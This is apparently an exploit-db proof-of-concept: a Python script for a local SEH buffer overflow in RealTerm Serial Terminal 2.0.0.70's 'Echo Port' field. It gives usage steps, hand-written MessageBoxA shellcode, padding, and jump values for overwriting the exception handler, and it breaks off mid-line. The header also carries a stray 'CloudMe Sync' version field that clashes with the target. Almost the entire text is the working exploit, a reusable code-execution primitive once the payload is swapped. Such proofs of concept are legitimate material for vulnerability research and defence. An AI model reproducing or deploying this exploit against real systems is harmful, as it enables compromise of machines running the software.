# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) # Date: 21.02.2019 # Exploit Author: Matteo Malvica # Vendor Homepage: https://realterm.sourceforge.io/ # Software Link: https://sourceforge.net/projects/realterm/files/ # Version: 2.0.0.70 # Category: Local # Contact: https://twitter.com/matteomalvica # Version: CloudMe Sync 1.11.2 # Tested on: Windows 7 SP1 x64 # Originail PoC https://www.exploit-db.com/exploits/46391 # 1.- Run the python script it will create a new file "carbonara.txt" # 2.- Copy the content of the new file 'carbonara.txt' to clipboard # 3.- Open realterm.exe # 4.- Go to 'Echo Port' tab # 5.- Paste clipboard in 'Port' field # 6.- Click on button -> Change # 7.- Check 'Echo On' or # 8.- Box! import socket import struct ''' badchars: 0x20,0x0a arwin.exe user32.dll MessageBoxA arwin - win32 address resolution program - by steve hanna - v.01 MessageBoxA is located at 0x747cfdae in user32.dll ''' shellcode = ( "\x33\xc0" # XOR EAX,EAX "\x50" # PUSH EAX => padding for lpCaption "\x68\x7a\x6f\x21\x21" # PUSH "zo!!" "\x68\x61\x76\x61\x6e" # PUSH "avan" "\x8B\xCC" # MOV ECX,ESP => PTR to lpCaption "\x50" # PUSH EAX => padding for lpText "\x68\x6e\x7a\x6f\x21" # PUSH "nzo!" "\x68\x61\x76\x61\x21" # PUSH "ava!" "\x8B\xD4" # MOV EDX,ESP => PTR to lpText "\x50" # PUSH EAX - uType=0x0 "\x51" # PUSH ECX - lpCaption "\x52" # PUSH EDX - lpText "\x50" # PUSH EAX - hWnd=0x0 "\xBE\xae\xfd\x7c\x74" # MOV ESI,USER32.MessageBoxA <<< hardcoded address "\xFF\xD6") # CALL ESI pad1="\x90"*(142-len(shellcode)) pad2 = "\x42" * 118 nseh = "\xEB\x80\x90\x90" jmp_back = "\xEB\x80\x90\x90" short_jmp = "\xEB\x12\x90\x90" seh = struct.pack('